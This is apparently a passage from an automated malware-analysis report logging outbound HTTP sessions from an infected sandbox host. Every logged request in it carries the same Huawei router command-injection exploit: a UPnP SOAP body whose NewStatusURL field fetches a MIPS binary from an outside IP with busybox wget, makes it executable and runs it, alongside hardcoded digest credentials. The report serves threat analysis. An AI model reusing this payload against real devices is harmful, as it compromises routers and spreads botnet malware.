69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  628192.168.2.1353066157.52.56.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300101042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  629192.168.2.1346216197.29.165.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300194025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  630192.168.2.1346836197.57.85.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300230026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  631192.168.2.1343790157.219.196.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300262928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  632192.168.2.1337534204.186.180.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300277948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  633192.168.2.1356382110.81.81.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300282955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  634192.168.2.133478875.244.207.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300287962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  635192.168.2.1351104157.98.223.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300307989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  636192.168.2.1354400197.212.89.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300322056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  637192.168.2.135100214.206.141.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300343037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  638192.168.2.1353092106.195.245.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300344944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
